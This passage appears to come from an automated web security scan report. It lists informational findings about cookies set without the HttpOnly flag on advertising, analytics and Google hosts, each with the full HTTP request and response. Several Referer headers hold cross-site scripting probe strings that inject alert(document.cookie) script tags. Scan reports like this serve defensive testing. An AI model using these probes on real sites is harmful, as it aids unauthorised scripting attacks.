Set-Cookie: phpAds_geoInfo=%7C%7C%7C%7C%7C%7C601.5168%7C601.5195%7C%7C%7C%7C%7Cgeoip; expires=Mon, 24-Jan-2011 22:09:26 GMT; path=/
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

14.211. http://as2.whdh.com/m/m.php/1295906131129/m.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as2.whdh.com
Path:   /m/m.php/1295906131129/m.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; expires=Sun, 24-Apr-2011 21:54:26 GMT; path=/; domain=.whdh.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m/m.php/1295906131129/m.gif HTTP/1.1
Host: as2.whdh.com
Proxy-Connection: keep-alive
Referer: http://www1.whdh.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Mon, 24 Jan 2011 21:54:26 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie2: WHDHSTR=173.193.214.243.1295906066204705; path=/
X-Powered-By: PHP/5.1.6
Set-Cookie: WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; expires=Sun, 24-Apr-2011 21:54:26 GMT; path=/; domain=.whdh.com
location: /m/m.php?pass=2&1295906066
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


14.212. http://at.amgdgt.com/ads/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://at.amgdgt.com
Path:   /ads/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • UA=AAAAAQAU5FRWDkay5gNIBniL3nCP0n0K9AIDA3gBY2BgYGZg_F7OwBLYwsDwT4SB4VQyAwODOAMDo25GXH4gA2O3HwPz36VIcqJgudhrXgxMAV4MLJd_IckB9QP1xS44DzQDDHzthBoYmBgYZugzMjAyMLDkMPEzCQAZjLq7zn9zgqgBAClnGck-; Domain=.amgdgt.com; Expires=Thu, 24-Feb-2011 01:35:47 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/?t=pp&px=10660&rnd=1596989115 HTTP/1.1
Host: at.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23?USNetwork/Dominos_11Q1_DXU_Opt_120
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAUaMxGSGTK5Wp9qxNESW3w7hCyFHoAAJFcc59Mh0I7lruTfrzkOUgAAAEtaF2gzw--; LO=AAAAAQAUTb0ojsGjTYemMhM8.wPqufZbuW0BAHVzYTt0eDs2MjM7ZGFsbGFzOzc1MjA3O3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjticm9hZGJhbmQ7MTczLjE5My4yMTQuMjQz; UA=AAAAAQAU6LV_14AmMYMgOwrAn3GlJXyBz.oDA3gBY2BgYGZg_F7OwBLYwsDwT4SB4VQyAwODOAMDo25GXH4gA2O3HwPz36VIcqJgudhrXgxMAV4MLJd_IckB9QP1xS44DzQDDHw1fjUwMDIwsOQwAi2CGBrNwAS2kmFGAesCoBzYHIbNvhAOkA8APJMd4Q--

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAU5FRWDkay5gNIBniL3nCP0n0K9AIDA3gBY2BgYGZg_F7OwBLYwsDwT4SB4VQyAwODOAMDo25GXH4gA2O3HwPz36VIcqJgudhrXgxMAV4MLJd_IckB9QP1xS44DzQDDHzthBoYmBgYZugzMjAyMLDkMPEzCQAZjLq7zn9zgqgBAClnGck-; Domain=.amgdgt.com; Expires=Thu, 24-Feb-2011 01:35:47 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Location: http://cdn.amgdgt.com/base/pixels/transparent.gif
Content-Length: 0
Date: Tue, 25 Jan 2011 01:35:46 GMT


14.213. http://autotrader.dealix.com/step1.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://autotrader.dealix.com
Path:   /step1.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • CkSE=1%2F24%2F2011+7%3A32%3A46+AM; path=/
  • CkSN=21028798455; path=/
  • CkUN=21028798455; expires=Thu, 21-Jan-2021 08:00:00 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /step1.asp HTTP/1.1
Host: autotrader.dealix.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 24 Jan 2011 15:02:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 12107
Content-Type: text/html
Set-Cookie: CkSE=1%2F24%2F2011+7%3A32%3A46+AM; path=/
Set-Cookie: CkSN=21028798455; path=/
Set-Cookie: CkUN=21028798455; expires=Thu, 21-Jan-2021 08:00:00 GMT; path=/
Cache-control: private


<!-- this is for Firefox Fix -->

<html>
   <head>
       
<title>Car Buying Service: New Car Buying Made Easy - Buy a car online at InvoiceDealers</title>
<meta name="description" content="InvoiceDe
...[SNIP]...

14.214. http://b.collective-media.net/seg/cm/de18_1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.collective-media.net
Path:   /seg/cm/de18_1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • cli=11ddec103f853dc; domain=collective-media.net; path=/; expires=Thu, 24-Jan-2013 02:27:23 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /seg/cm/de18_1 HTTP/1.1
Accept: */*
Referer: http://www.soundingsonline.com/archives?'"--></style></script><script>alert(0x001E2B)</script>
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: b.collective-media.net
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Tue, 25 Jan 2011 02:27:23 GMT
Content-Type: image/gif
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: cli=11ddec103f853dc; domain=collective-media.net; path=/; expires=Thu, 24-Jan-2013 02:27:23 GMT
Content-Length: 42

GIF89a.............!.......,...........D.;

14.215. http://b.scorecardresearch.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • UID=1f00d615-24.143.206.88-1294170954; expires=Wed, 23-Jan-2013 22:20:55 GMT; path=/; domain=.scorecardresearch.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=8&c2=3005693&rn=575395576&c7=http%3A%2F%2Ftweetmeme.com%2F&c3=3&c4=http%3A%2F%2Fwww.tweetmeme.com&c8=TweetMeme%20-%20Search%20and%20Retweet%20the%20Hottest%20Stories&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://tweetmeme.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 24 Jan 2011 22:20:55 GMT
Connection: close
Set-Cookie: UID=1f00d615-24.143.206.88-1294170954; expires=Wed, 23-Jan-2013 22:20:55 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


14.216. http://b.scorecardresearch.com/r

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /r

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • UID=1f00d615-24.143.206.88-1294170954; expires=Wed, 23-Jan-2013 15:58:37 GMT; path=/; domain=.scorecardresearch.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=6035740&d.c=gif&d.o=detraderonline&d.x=87575725&d.t=page&d.u=http%3A%2F%2Fwww.traderonline.com%2Fx22ec89d%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E93a08fbf703&d.r=http%3A%2F%2Fburp%2Fshow%2F5 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.traderonline.com/x22ec89d%3Cscript%3Ealert(document.cookie)%3C/script%3E93a08fbf703
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Mon, 24 Jan 2011 15:58:37 GMT
Connection: close
Set-Cookie: UID=1f00d615-24.143.206.88-1294170954; expires=Wed, 23-Jan-2013 15:58:37 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

14.217. http://b3.mookie1.com/2/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]@x90

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_o4efm_qppm_iuuq=ffffffff09419e2845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0Rw6qcLcmo_34070076.html?rtbhost=rts-rr14.sldc.dataxu.net&btid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkV8ZWMxNTA4OWUtNjFiYi00Y2FmLTkzZTItNTIwNGU4NTNlZDI3fDEyOTU5MTkzNDM3NTl8MXwwRmVYbGtHVmN4fDBSdzZxY0xjbW98ODg5NTY1MzE3fA&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TT4o7gABkFsK5WfYIOdxvqDxBisV1iCr7MNZGg&euid=Q0FFU0VDSUFxLVBVbW8yVVJpZkRFMzFLLTJB&slotid=MQ&fiu=MEZlWGxrR1ZjeA&ciu=MFJ3NnFjTGNtbw&reqid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkU&ccw=SUFCMTkjMC4wfElBQjE1IzAuMHxJQUIxOSMwLjB8SUFCMTUjMC4w&epid=&bp=158&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&s=http%3A%2F%2Fjoomlacode.org%2Fgf%2Fproject%2Fjoomla%2Freporting%2F&refurl=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; NXCLICK2=011Pbk1ANX_CasaleB3/ATTWL/11Q1/MobRONRTG/300/1243587456!y!90!Ayp!Cly; id=914803576615380; RMFL=011PfKJbU106t6

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 01:35:44 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 508
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2845525d5f4f58455e445a4a423660;path=/

<SCRIPT TYPE="text/javascript" language="JavaScript">
var B3d=new Date();
var B3m=B3d.getTime();
B3d.setTime(B3m+30*24*60*60*1000);
document.cookie="Dominos=DataXuB3;expires="+B3d.toGMTString()+";path
...[SNIP]...

14.218. http://backend.parenthood.com/jscripts/p7EPMscripts.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://backend.parenthood.com
Path:   /jscripts/p7EPMscripts.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • BIGipServerwww_parenthood.com_http_pool=457334026.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jscripts/p7EPMscripts.js HTTP/1.1
Host: backend.parenthood.com
Proxy-Connection: keep-alive
Referer: http://www.parenthood.com/?d1907'-alert(document.cookie)-'807a8eb3eff=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:08:42 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sat, 27 Sep 2008 21:38:20 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Cache-Control: public
Expires: Thu, 15 May 2010 20:00:00 GMT
Content-Type: application/x-javascript
Set-Cookie: BIGipServerwww_parenthood.com_http_pool=457334026.20480.0000; path=/
Content-Length: 9757


/*

================================================
PVII Elevator Panel Magic scripts
Copyright (c) 2008 Project Seven Development
www.projectseven.com
Version: 1.3.3 - script bui
...[SNIP]...

14.219. http://backend.parenthood.com/jscripts/shopblog_style05_master.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://backend.parenthood.com
Path:   /jscripts/shopblog_style05_master.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • BIGipServerwww_parenthood.com_http_pool=440556810.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jscripts/shopblog_style05_master.css HTTP/1.1
Host: backend.parenthood.com
Proxy-Connection: keep-alive
Referer: http://www.parenthood.com/?d1907'-alert(document.cookie)-'807a8eb3eff=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:16:47 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 09 Oct 2008 21:42:38 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Cache-Control: public
Expires: Thu, 15 May 2010 20:00:00 GMT
Content-Type: text/css
Set-Cookie: BIGipServerwww_parenthood.com_http_pool=440556810.20480.0000; path=/
Content-Length: 1769

/*
-----------------------------------
Elevator Panels
by Project Seven Development
www.projectseven.com
Style Theme: 05 - Basic
-----------------------------------
*/
.p7EPM05 .p7epm_tri
...[SNIP]...

14.220. http://backend.parenthood.com/s_code.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://backend.parenthood.com
Path:   /s_code.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • BIGipServerwww_parenthood.com_http_pool=457334026.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /s_code.js HTTP/1.1
Host: backend.parenthood.com
Proxy-Connection: keep-alive
Referer: http://www.parenthood.com/?d1907'-alert(document.cookie)-'807a8eb3eff=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:08:42 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 02 May 2008 19:53:56 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Cache-Control: public
Expires: Thu, 15 May 2010 20:00:00 GMT
Content-Type: application/x-javascript
Set-Cookie: BIGipServerwww_parenthood.com_http_pool=457334026.20480.0000; path=/
Content-Length: 22461

/* SiteCatalyst code version: H.15.1.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */

var s_account="deparenthood"
var s=s_gi(s_account)
/******************
...[SNIP]...

14.221. http://bh.contextweb.com/bh/set.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/set.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • V=gFEcJzqCjXJj; Domain=.contextweb.com; Expires=Thu, 19-Jan-2012 21:55:49 GMT; Path=/
  • cwbh1=2709%3B02%2F23%2F2011%3BTOT09; Domain=.contextweb.com; Expires=Tue, 29-Dec-2015 21:55:49 GMT; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/set.aspx?action=add&advid=2709&token=TOT09 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://7newsboston.disqus.com/stats.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V=gFEcJzqCjXJj

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
CW-Server: cw-web83
Set-Cookie: V=gFEcJzqCjXJj; Domain=.contextweb.com; Expires=Thu, 19-Jan-2012 21:55:49 GMT; Path=/
Set-Cookie: cwbh1=2709%3B02%2F23%2F2011%3BTOT09; Domain=.contextweb.com; Expires=Tue, 29-Dec-2015 21:55:49 GMT; Path=/
Content-Type: image/gif
Date: Mon, 24 Jan 2011 21:55:48 GMT
Content-Length: 49

GIF89a...................!.......,...........T..;

14.222. http://bid.openx.net/json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bid.openx.net
Path:   /json

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • s=9be4e4e2-589c-4bbb-b5f5-bab9ba09b572; version=1; path=/; domain=.openx.net;
  • p=1295921102; version=1; path=/; domain=.openx.net; max-age=63072000;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /json?c=OXM_15781025984&pid=7f43337b-cb6f-453f-9ae5-4abd7cd18bda&s=468x60&f=0.1&cid=oxpv1%3A58349-98644-254472-4738-17099&hrid=dda27c0e92ce176b4b94dc8a5861a24c-1295921101&url=http%3A%2F%2Fwww.netlingo.com%2F HTTP/1.1
Host: bid.openx.net
Proxy-Connection: keep-alive
Referer: http://www.netlingo.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i=8e1bb757-a622-431b-967f-869e18a071fe

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=iso-8859-1
Cache-Control: no-cache, must-revalidate
P3P: CP="CUR ADM OUR NOR STA NID"
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: s=9be4e4e2-589c-4bbb-b5f5-bab9ba09b572; version=1; path=/; domain=.openx.net;
Set-Cookie: p=1295921102; version=1; path=/; domain=.openx.net; max-age=63072000;

OXM_15781025984({"r":"\u003cdiv style\u003d\"position: absolute; width: 0px; height: 0px; overflow: hidden\"\u003e\u003cimg src\u003d\"http://bid.openx.net/log?l\u003dH4sIAAAAAAAAAGWQO07DQBRFzzixM_aYW
...[SNIP]...

14.223. http://bid.openx.net/json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bid.openx.net
Path:   /json

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • p=1295929661; version=1; path=/; domain=.openx.net; max-age=63072000;
  • fc=H4sIAAAAAAAAAONlYOTgYWBgYGRg0D7MwAAAxUfwuA8AAAA=; version=1; path=/; domain=.openx.net; max-age=31536000;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /json?c=OXM_32728599221&pid=7f43337b-cb6f-453f-9ae5-4abd7cd18bda&s=728x90&f=0.1&cid=oxpv1%3A58349-98644-254472-4738-17101&hrid=39925b34906404a722d1479181f4316b-1295921102&url=http%3A%2F%2Fwww.netlingo.com%2F HTTP/1.1
Host: bid.openx.net
Proxy-Connection: keep-alive
Referer: http://www.netlingo.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i=8e1bb757-a622-431b-967f-869e18a071fe; s=9be4e4e2-589c-4bbb-b5f5-bab9ba09b572; p=1295921102; _wc[1295921102372]=H4sIAAAAAAAAAONgYGRg0D7MwcDEwNCxkYOBmYEh_zwDANrv7-sWAAAA

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=iso-8859-1
Cache-Control: no-cache, must-revalidate
P3P: CP="CUR ADM OUR NOR STA NID"
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: _wc[1295921102372]=; version=1; path=/; domain=.openx.net; max-age=0;
Set-Cookie: p=1295929661; version=1; path=/; domain=.openx.net; max-age=63072000;
Set-Cookie: fc=H4sIAAAAAAAAAONlYOTgYWBgYGRg0D7MwAAAxUfwuA8AAAA=; version=1; path=/; domain=.openx.net; max-age=31536000;

(function(){var req={f:OXM_32728599221,o:null,w:10720000,c:"\u003cscript type\u003d'text/javascript'\u003evar isIE \u003d false;\u003c/script\u003e\u003c!--[if IE]\u003e\u003cscript type\u003d'text/ja
...[SNIP]...

14.224. http://bid.openx.net/log

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bid.openx.net
Path:   /log

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • _wc[1295921102372]=H4sIAAAAAAAAAONgYGRg0D7MwcDEwNCxkYOBmYEh_zwDANrv7-sWAAAA; version=1; path=/; domain=.openx.net; max-age=2592000;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /log?l=H4sIAAAAAAAAAGWQO07DQBRFzzixM_aYWIi_AJOCLrKwQ_A4DTQUUIQGsYEopmUDFKFBSNT0bIE10MMqkFgGM_4EIaaZ9-7c0bnvKQRwqOflJC_mWTI-SUfJeJaVyUyP0qRIdV7q7PY414XEmZ4efYS4svrkeHRA0jW1lLgwfJd48PQm6cHdZ4Q0Les4xtk1Ds_oEh9Fn4hV1thih2122WePOMK3fvMU2LtjMA6eIrbNzfV5wIF9Rj4vAga0J8SrE_GbSA-qRPe-TSQWLzaRyC-bRAKvYTkmTb_hOZYnCadnD1f_oeLx9S-0FxDUtYiVGam1h43jS7GyFPuNOFFmulqsNgFuYBa0BGzU5feFYrP1_QBQiO-kpAEAAA==&l_xyz=8_28623 HTTP/1.1
Host: bid.openx.net
Proxy-Connection: keep-alive
Referer: http://www.netlingo.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i=8e1bb757-a622-431b-967f-869e18a071fe; s=9be4e4e2-589c-4bbb-b5f5-bab9ba09b572; p=1295921102

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Cache-Control: no-cache, must-revalidate
P3P: CP="CUR ADM OUR NOR STA NID"
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 42
Pragma: no-cache
Set-Cookie: _wc[1295921102372]=H4sIAAAAAAAAAONgYGRg0D7MwcDEwNCxkYOBmYEh_zwDANrv7-sWAAAA; version=1; path=/; domain=.openx.net; max-age=2592000;

GIF89a.............!.......,...........D.;

14.225. http://blogsearch.google.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogsearch.google.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • PREF=ID=47fa77d95684576f:TM=1295881311:LM=1295881311:S=7WF0WTQQYZ1xaMCz; expires=Wed, 23-Jan-2013 15:01:51 GMT; path=/; domain=.google.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: blogsearch.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:01:51 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=47fa77d95684576f:TM=1295881311:LM=1295881311:S=7WF0WTQQYZ1xaMCz; expires=Wed, 23-Jan-2013 15:01:51 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: bsfe
X-XSS-Protection: 1; mode=block
Connection: close

<html><head><meta HTTP-EQUIV="content-type" content="text/html; charset=UTF-8"><meta description="Google Blog Search provides fresh, relevant search results from millions of feed-enabled blogs. Users
...[SNIP]...

14.226. http://books.google.com/bkshp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://books.google.com
Path:   /bkshp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • PREF=ID=d33f47f272219df9:TM=1295881312:LM=1295881312:S=WikbyyY0JXmoqzCh; expires=Wed, 23-Jan-2013 15:01:52 GMT; path=/; domain=.google.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bkshp HTTP/1.1
Host: books.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:01:52 GMT
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=d33f47f272219df9:TM=1295881312:LM=1295881312:S=WikbyyY0JXmoqzCh; expires=Wed, 23-Jan-2013 15:01:52 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: OFE/0.1
Connection: close

<!DOCTYPE html><html><head><script>(function(){function a(d){this.t={};this.tick=function(e,f,b){b=b?b:(new Date).getTime();this.t[e]=[b,f]};this.tick("start",null,d)}var c=new a;window.jstiming={Time
...[SNIP]...

14.227. http://books.google.com/books

Summary

Severity:   Information
Confidence:   Certain
Host:   http://books.google.com
Path:   /books

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
